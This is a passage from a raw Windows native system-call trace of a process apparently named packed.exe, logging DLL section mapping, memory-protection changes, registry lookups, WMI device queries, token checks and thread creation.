0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\WS2_32.dll"}, 1239736, ... ) }, 1239736, ... ) == 0x0 01350 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "wininet.dll"}, ... 64, ) }, ... 64, ) == 0x0 01351 896 NtMapViewOfSection (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x42c10000), 0x0, 847872, ) == 0x0 01352 896 NtClose (64, ... ) == 0x0 01353 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01354 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01355 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01356 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01357 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01358 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01359 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "SHLWAPI.dll"}, ... 64, ) }, ... 64, ) == 0x0 01360 896 NtMapViewOfSection (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x77f60000), 0x0, 483328, ) == 0x0 01361 896 NtClose (64, ... ) == 0x0 01362 896 NtProtectVirtualMemory (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01363 896 NtProtectVirtualMemory (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01364 896 NtFlushInstructionCache (-1, 2012614656, 2076, ... ) == 0x0 01365 896 NtProtectVirtualMemory (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01366 896 NtProtectVirtualMemory (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01367 896 NtFlushInstructionCache (-1, 2012614656, 2076, ... ) == 0x0 01368 896 NtProtectVirtualMemory (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01369 896 NtProtectVirtualMemory (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01370 896 NtFlushInstructionCache (-1, 2012614656, 2076, ... ) == 0x0 01371 896 NtProtectVirtualMemory (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01372 896 NtProtectVirtualMemory (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01373 896 NtFlushInstructionCache (-1, 2012614656, 2076, ... ) == 0x0 01374 896 NtProtectVirtualMemory (-1, (0x77f61000), 2076, 4, ... (0x77f61000), 4096, 32, ) == 0x0 01375 896 NtProtectVirtualMemory (-1, (0x77f61000), 4096, 32, ... (0x77f61000), 4096, 4, ) == 0x0 01376 896 NtFlushInstructionCache (-1, 2012614656, 2076, ... ) == 0x0 01377 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01378 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01379 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01380 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01381 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01382 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01383 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01384 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01385 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01386 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01387 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01388 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01389 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "Normaliz.dll"}, ... 64, ) }, ... 64, ) == 0x0 01390 896 NtMapViewOfSection (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0xaf0000), 0x0, 36864, ) == STATUS_IMAGE_NOT_AT_BASE 01391 896 NtProtectVirtualMemory (-1, (0xaf1000), 18944, 4, ... (0xaf1000), 20480, 32, ) == 0x0 01392 896 NtProtectVirtualMemory (-1, (0xaf7000), 1024, 4, ... (0xaf7000), 4096, 2, ) == 0x0 01393 896 NtProtectVirtualMemory (-1, (0xaf8000), 1536, 4, ... (0xaf8000), 4096, 2, ) == 0x0 01394 896 NtMapViewOfSection (64, -1, (0xaf0000), 0, 0, 0x0, 36864, 1, 0, 4, ... ) == STATUS_CONFLICTING_ADDRESSES 01395 896 NtProtectVirtualMemory (-1, (0xaf1000), 18944, 16, ... (0xaf1000), 20480, 4, ) == 0x0 01396 896 NtProtectVirtualMemory (-1, (0xaf7000), 1024, 2, ... (0xaf7000), 4096, 8, ) == 0x0 01397 896 NtProtectVirtualMemory (-1, (0xaf8000), 1536, 2, ... (0xaf8000), 4096, 8, ) == 0x0 01398 896 NtFlushInstructionCache (-1, 0, 0, ... ) == 0x0 01399 896 NtClose (64, ... ) == 0x0 01400 896 NtProtectVirtualMemory (-1, (0xaf1000), 160, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01401 896 NtProtectVirtualMemory (-1, (0xaf1000), 4096, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01402 896 NtFlushInstructionCache (-1, 11472896, 160, ... ) == 0x0 01403 896 NtProtectVirtualMemory (-1, (0xaf1000), 160, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01404 896 NtProtectVirtualMemory (-1, (0xaf1000), 4096, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01405 896 NtFlushInstructionCache (-1, 11472896, 160, ... ) == 0x0 01406 896 NtProtectVirtualMemory (-1, (0xaf1000), 160, 4, ... (0xaf1000), 4096, 16, ) == 0x0 01407 896 NtProtectVirtualMemory (-1, (0xaf1000), 4096, 16, ... (0xaf1000), 4096, 4, ) == 0x0 01408 896 NtFlushInstructionCache (-1, 11472896, 160, ... ) == 0x0 01409 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01410 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01411 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01412 896 NtOpenSection (0xe, {24, 8, 0x40, 0, 0, (0xe, {24, 8, 0x40, 0, 0, "iertutil.dll"}, ... 64, ) }, ... 64, ) == 0x0 01413 896 NtMapViewOfSection (64, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x42990000), 0x0, 282624, ) == 0x0 01414 896 NtClose (64, ... ) == 0x0 01415 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01416 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01417 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01418 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01419 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01420 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01421 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01422 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01423 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01424 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01425 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01426 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01427 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01428 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01429 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01430 896 NtProtectVirtualMemory (-1, (0x42991000), 616, 4, ... (0x42991000), 4096, 32, ) == 0x0 01431 896 NtProtectVirtualMemory (-1, (0x42991000), 4096, 32, ... (0x42991000), 4096, 4, ) == 0x0 01432 896 NtFlushInstructionCache (-1, 1117327360, 616, ... ) == 0x0 01433 896 NtProtectVirtualMemory (-1, (0x42c11000), 1452, 4, ... (0x42c11000), 4096, 32, ) == 0x0 01434 896 NtProtectVirtualMemory (-1, (0x42c11000), 4096, 32, ... (0x42c11000), 4096, 4, ) == 0x0 01435 896 NtFlushInstructionCache (-1, 1119948800, 1452, ... ) == 0x0 01436 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SHLWAPI.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01437 896 NtOpenKey (0x2000000, {24, 28, 0x40, 0, 0, (0x2000000, {24, 28, 0x40, 0, 0, "Software\Microsoft\Windows\CurrentVersion\Explorer\Performance"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01438 896 NtCreateSemaphore (0x1f0003, {24, 48, 0x80, 1344112, 0, (0x1f0003, {24, 48, 0x80, 1344112, 0, "shell.{A48F1A32-A340-11D1-BC6B-00A0C90312E1}"}, 0, 2147483647, ... 64, ) }, 0, 2147483647, ... 64, ) == STATUS_OBJECT_NAME_EXISTS 01439 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Normaliz.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01440 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iertutil.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01441 896 NtQueryPerformanceCounter (... {-1446178203, 16}, {3579545, 0}, ) == 0x0 01442 896 NtOpenKey (0x80000000, {24, 0, 0x40, 0, 0, (0x80000000, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wininet.dll"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01443 896 NtQueryPerformanceCounter (... {-1446158198, 16}, {3579545, 0}, ) == 0x0 01444 896 NtQuerySystemInformation (Basic, 44, ... {Unknown=0,MaximumIncrement=156250,PhysicalPageSize=0x1000,NumberOfPhysicalPages=0xff7c,LowestPhysicalPage=0x1,HighestPhysicalPage=0xffff,AllocationGranularity=0x10000,LowestUserAddress=0x10000,HighestUserAddress=0x7ffeffff,ActiveProcessors=1,NumberProcessors=1,}, 0x0, ) == 0x0 01445 896 NtAllocateVirtualMemory (-1, 0, 0, 1048576, 8192, 4, ... 11534336, 1048576, ) == 0x0 01446 896 NtAllocateVirtualMemory (-1, 11534336, 0, 4096, 4096, 4, ... 11534336, 4096, ) == 0x0 01447 896 NtAllocateVirtualMemory (-1, 11538432, 0, 8192, 4096, 4, ... 11538432, 8192, ) == 0x0 01448 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 52, ) == 0x0 01449 896 NtCreateFile (0xc0100080, {24, 0, 0x40, 0, 1239120, (0xc0100080, {24, 0, 0x40, 0, 1239120, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 76, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 76, {status=0x0, info=0}, ) == 0x0 01450 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 80, ) == 0x0 01451 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12e90c, 0x22414c, (76, 80, 0x0, 0x12e90c, 0x22414c, "T\351\22\0\0\0\0\0\1\0\0\0\2\0\0\0\24\0\0\0\34\0\0\0P\0\0\0\0\0\0\0L\0\0\0\0\0\0\0\2\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\20\10\0\0\0\0\0\0\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\0\10\0\0\0\0\0\0\0\0\0\2\0\0\0", 104, 80, ... , 104, 80, ... 01452 896 NtOpenKey (0x82000000, {24, 0, 0x240, 0, 0, (0x82000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\WMI\Security"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01453 896 NtQueryValueKey (-2147481368, (-2147481368, "DF8480A1-7492-4F45-AB78-1084642581FB", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01454 896 NtQueryValueKey (-2147481368, (-2147481368, "00000000-0000-0000-0000-000000000000", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01455 896 NtClose (-2147481368, ... ) == 0x0 01456 896 NtClose (2280, ... ) == 0x0 01451 896 NtDeviceIoControlFile ... {status=0x0, info=80}, ... {status=0x0, info=80}, " \10P\342\0\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#o\0e\0w\0\0\0\0\0\0\0\0\0\0\0\2\0\0\0U\4\376\14\272\223\15D\243\376U9s\320\267#\0\20\10\0T\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0 01457 896 NtCreateFile (0xc0100080, {24, 0, 0x40, 0, 1239336, (0xc0100080, {24, 0, 0x40, 0, 1239336, "\??\WMIDataDevice"}, 0x0, 128, 0, 1, 64, 0, 0, ... 88, {status=0x0, info=0}, ) }, 0x0, 128, 0, 1, 64, 0, 0, ... 88, {status=0x0, info=0}, ) == 0x0 01458 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 92, ) == 0x0 01459 896 NtDuplicateObject (-1, -1, -1, 0x0, 0, 2, ... 96, ) == 0x0 01460 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 100, ) == 0x0 01461 896 NtCreateEvent (0x1f0003, 0x0, 1, 0, ... 104, ) == 0x0 01462 896 NtAllocateVirtualMemory (-1, 11546624, 0, 8192, 4096, 4, ... 11546624, 8192, ) == 0x0 01463 896 NtAllocateVirtualMemory (-1, 0, 0, 1048576, 8192, 4, ... 12582912, 1048576, ) == 0x0 01464 896 NtAllocateVirtualMemory (-1, 13623296, 0, 8192, 4096, 4, ... 13623296, 8192, ) == 0x0 01465 896 NtProtectVirtualMemory (-1, (0xcfe000), 4096, 260, ... (0xcfe000), 4096, 4, ) == 0x0 01466 896 NtCreateThread (0x1f03ff, 0x0, -1, 1238512, 1238456, 1, ... 108, {1252, 376}, ) == 0x0 01467 896 NtQueryInformationThread (108, Basic, 28, ... {ExitStatus=0x103,TebBaseAddress=0x7ffde000,Pid=1252,Tid=376,}, 0x0, ) == 0x0 01468 896 NtRequestWaitReplyPort (24, {28, 56, new_msg, 0, 120462, 69, 1239080, 11534712} (24, {28, 56, new_msg, 0, 120462, 69, 1239080, 11534712} "\0\0\0\0\1\0\1\0p\5\221|\377\377\377\377l\0\0\0\344\4\0\0x\1\0\0" ... {28, 56, reply, 0, 1252, 896, 82008, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\377\377\377\377l\0\0\0\344\4\0\0x\1\0\0" ) ... {28, 56, reply, 0, 1252, 896, 82008, 0} (24, {28, 56, new_msg, 0, 120462, 69, 1239080, 11534712} "\0\0\0\0\1\0\1\0p\5\221|\377\377\377\377l\0\0\0\344\4\0\0x\1\0\0" ... {28, 56, reply, 0, 1252, 896, 82008, 0} "\0\0\0\0\1\0\1\0\0\0\0\0\377\377\377\377l\0\0\0\344\4\0\0x\1\0\0" ) ) == 0x0 01469 896 NtResumeThread (108, ... 1, ) == 0x0 01470 896 NtClose (108, ... 01471 376 NtCreateEvent (0x100003, 0x0, 1, 0, ... 112, ) == 0x0 01472 376 NtWaitForSingleObject (112, 0, 0x0, ... 01470 896 NtClose ... ) == 0x0 01473 896 NtSetEvent (92, ... 0x0, ) == 0x0 01474 896 NtSetEvent (52, ... 0x0, ) == 0x0 01475 896 NtClose (52, ... ) == 0x0 01476 896 NtCreateEvent (0x1f0003, 0x0, 0, 0, ... 52, ) == 0x0 01477 896 NtAllocateVirtualMemory (-1, 11554816, 0, 4096, 4096, 4, ... 11554816, 4096, ) == 0x0 01478 896 NtDeviceIoControlFile (76, 80, 0x0, 0x12e90c, 0x22414c, (76, 80, 0x0, 0x12e90c, 0x22414c, "T\351\22\0\0\0\0\0\2\0\0\0\2\0\0\0\24\0\0\0\34\0\0\0P\0\0\0\0\0\0\0L\0\0\0\0\0\0\0\2\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\20\10\0\0\0\0\0\0\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\0\10\0\0\0\0\0\0\0\0\0\2\0\0\0", 104, 80, ... , 104, 80, ... 01479 896 NtOpenKey (0x82000000, {24, 0, 0x240, 0, 0, (0x82000000, {24, 0, 0x240, 0, 0, "\Registry\Machine\System\CurrentControlSet\Control\WMI\Security"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01480 896 NtQueryValueKey (-2147481368, (-2147481368, "DF8480A1-7492-4F45-AB78-1084642581FB", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01481 896 NtQueryValueKey (-2147481368, (-2147481368, "00000000-0000-0000-0000-000000000000", Full, 130, ... ) , Full, 130, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01482 896 NtClose (-2147481368, ... ) == 0x0 01483 896 NtClose (2280, ... ) == 0x0 01478 896 NtDeviceIoControlFile ... {status=0x0, info=80}, ... {status=0x0, info=80}, "x\227\340\341\0\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344o\0\1\0CMVa\0\0\0\0\0\0\0\0\2\0\0\0\254\253\177yX{\226G\271$\325\21x\245\234\344\0\20\10\0l\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", ) , ) == 0x0 01484 896 NtSetEvent (92, ... 0x0, ) == 0x0 01485 896 NtSetEvent (52, ... 0x0, ) == 0x0 01486 896 NtClose (52, ... ) == 0x0 01487 896 NtOpenThreadToken (-2, 0x8, 0, ... ) == STATUS_NO_TOKEN 01488 896 NtOpenProcessToken (-1, 0xa, ... 52, ) == 0x0 01489 896 NtDuplicateToken (52, 0xc, {24, 0, 0x0, 0, 1239696, 0x0}, 0, 2, ... 116, ) == 0x0 01490 896 NtClose (52, ... ) == 0x0 01491 896 NtAccessCheck (1334208, 116, 0x1, 1239772, 1239824, 56, 1239804, ... (0x1), ) == 0x0 01492 896 NtClose (116, ... ) == 0x0 01493 896 NtQueryDefaultUILanguage (1238576, ... 01494 896 NtOpenThreadTokenEx (-2, 0x20008, 1, 512, ... ) == STATUS_NO_TOKEN 01495 896 NtOpenProcessTokenEx (-1, 0x20008, 512, ... -2147481368, ) == 0x0 01496 896 NtQueryInformationToken (-2147481368, User, 80, ... {token info, class 1, size 36}, 36, ) == 0x0 01497 896 NtClose (-2147481368, ... ) == 0x0 01498 896 NtOpenKey (0x2000000, {24, 0, 0x640, 0, 0, (0x2000000, {24, 0, 0x640, 0, 0, "\REGISTRY\USER\S-1-5-21-1292428093-1383384898-725345543-1003"}, ... -2147481368, ) }, ... -2147481368, ) == 0x0 01499 896 NtOpenKey (0x80000000, {24, -2147481368, 0x240, 0, 0, (0x80000000, {24, -2147481368, 0x240, 0, 0, "Software\Policies\Microsoft\Control Panel\Desktop"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01500 896 NtOpenKey (0x80000000, {24, -2147481368, 0x640, 0, 0, (0x80000000, {24, -2147481368, 0x640, 0, 0, "Control Panel\Desktop"}, ... -2147481452, ) }, ... -2147481452, ) == 0x0 01501 896 NtQueryValueKey (-2147481452, (-2147481452, "MultiUILanguageId", Partial, 256, ... ) , Partial, 256, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01502 896 NtClose (-2147481452, ... ) == 0x0 01503 896 NtClose (-2147481368, ... ) == 0x0 01493 896 NtQueryDefaultUILanguage ... ) == 0x0 01504 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wininet.dll.123.Manifest"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01505 896 NtQueryDefaultLocale (1, 1236672, ... ) == 0x0 01506 896 NtOpenFile (0x1200a9, {24, 0, 0x40, 0, 0, (0x1200a9, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\system32\wininet.dll.123.Config"}, 1, 96, ... ) }, 1, 96, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01507 896 NtRequestWaitReplyPort (24, {128, 156, new_msg, 0, 2088850039, 1237708, 1179817, 1237432} (24, {128, 156, new_msg, 0, 2088850039, 1237708, 1179817, 1237432} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\300\346\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82096, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\300\346\22\0\0\0\0\0" ) ... {128, 156, reply, 0, 1252, 896, 82096, 0} (24, {128, 156, new_msg, 0, 2088850039, 1237708, 1179817, 1237432} "\210\6!\1\33\0\1\0`\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\300\346\22\0\0\0\0\0" ... {128, 156, reply, 0, 1252, 896, 82096, 0} "\300\270\26\0\33\0\1\0\0\0\0\0\0\0\0\0\1\0\0\0\0\0\11\4\1\1\1\0>\0@\0\250\6!\1\0\0\0\0\377\377\377\377\0\0\0\0PR\313B\0\0\0\0\370\2\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\0,\0\350\6!\1\0\0\0\0\0\0\0\0\300\346\22\0\0\0\0\0" ) ) == 0x0 01508 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01509 896 NtOpenKey (0x8, {24, 0, 0x40, 0, 0, (0x8, {24, 0, 0x40, 0, 0, "\Registry\Machine\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01510 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01511 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01512 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\u:\work\packed.exe.Local\"}, 1235900, ... ) }, 1235900, ... ) == STATUS_OBJECT_NAME_NOT_FOUND 01513 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01514 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01515 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01516 896 NtQueryAttributesFile ({24, 0, 0x40, 0, 0, ({24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 1235964, ... ) }, 1235964, ... ) == 0x0 01517 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03"}, 3, 33, ... 116, {status=0x0, info=1}, ) }, 3, 33, ... 116, {status=0x0, info=1}, ) == 0x0 01518 896 NtQueryDebugFilterState (53, 2, ... ) == 0x0 01519 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll"}, 5, 96, ... 52, {status=0x0, info=1}, ) }, 5, 96, ... 52, {status=0x0, info=1}, ) == 0x0 01520 896 NtCreateSection (0xe, 0x0, 0x0, 16, 134217728, 52, ... 120, ) == 0x0 01521 896 NtClose (52, ... ) == 0x0 01522 896 NtMapViewOfSection (120, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 16, ... (0xd10000), 0x0, 1056768, ) == 0x0 01523 896 NtClose (120, ... ) == 0x0 01524 896 NtUnmapViewOfSection (-1, 0xd10000, ... ) == 0x0 01525 896 NtOpenFile (0x100020, {24, 0, 0x40, 0, 0, (0x100020, {24, 0, 0x40, 0, 0, "\??\C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll"}, 5, 96, ... 120, {status=0x0, info=1}, ) }, 5, 96, ... 120, {status=0x0, info=1}, ) == 0x0 01526 896 NtCreateSection (0xf, 0x0, 0x0, 16, 16777216, 120, ... 52, ) == 0x0 01527 896 NtQuerySection (52, Image, 48, ... {section info, class 1, size 48}, 0x0, ) == 0x0 01528 896 NtClose (120, ... ) == 0x0 01529 896 NtMapViewOfSection (52, -1, (0x0), 0, 0, 0x0, 0, 1, 0, 4, ... (0x773d0000), 0x0, 1060864, ) == 0x0 01530 896 NtClose (52, ... ) == 0x0 01531 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01532 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01533 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01534 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01535 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01536 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01537 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01538 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01539 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01540 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01541 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01542 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01543 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01544 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01545 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01546 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01547 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... (0x773d1000), 4096, 4, ) == 0x0 01548 896 NtFlushInstructionCache (-1, 2000490496, 1924, ... ) == 0x0 01549 896 NtProtectVirtualMemory (-1, (0x773d1000), 1924, 4, ... (0x773d1000), 4096, 32, ) == 0x0 01550 896 NtProtectVirtualMemory (-1, (0x773d1000), 4096, 32, ... 